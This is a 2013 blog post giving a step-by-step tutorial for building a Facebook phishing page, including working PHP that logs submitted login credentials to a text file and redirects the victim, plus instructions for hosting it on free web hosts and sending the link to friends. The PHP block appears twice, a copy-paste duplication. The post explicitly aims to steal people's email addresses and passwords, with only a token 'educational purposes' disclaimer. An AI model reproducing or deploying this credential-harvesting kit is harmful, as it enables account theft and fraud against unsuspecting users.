Posted by :
Unknown
Thursday, 12 December 2013

What is a Phishing Page?
A Phishing page is a fake page which is used to hack someone's facebook account. This is the easiest tutorial to create a phishing page of facebook.
Steps to Create a Phishing Page:-
1.Copy the source
The first step to create a phishing page is, you need to go to this link to copy the html script of facebook
This Page will appear

Press Ctrl+A(select all) and then press Ctrl+C to copy the source.
2.Save the source
To Save The Source Open A notepad and press Ctrl+V to past the source.Press Ctrl+F on the notepad and search for action .A line like this will appear.
action="https://www.facebook.com/login.php?login_attempt=1"
All you need to do is replace the link in the codes with post.php . Now save the notepad as Phishing.htm(note: not save it as .html) in your desktop.
Now open a new notepad and save the below data as post.php
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Now You Have Two Files phishing.htm and post.php
3.Upload it!
Now You have to upload those files in any of the websites such as 000webhost or my3gb
We Prefer you 000webhost

Now Sign Up For It...

Now Go To the Control Pannel and then on file manager...
After that a new window will pop up.Now go to public_html.

Delete the file named default.php and upload the other two files.
5.Test it
Now the last step, click on the link phishing.htm .
It will look as same as facebook page.
Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
Click on view now u will have your friend's password and email id and you are done
Now just send the link of phishing.htm and know their Email Adress and password...........
For Educational Purposes Only
Related Posts :
- Back to Home »
- Tips and Hacks »
- Easiest Tutorial | Create A Facebook Phishing page | Hack Your Friends Facebook Account.!!
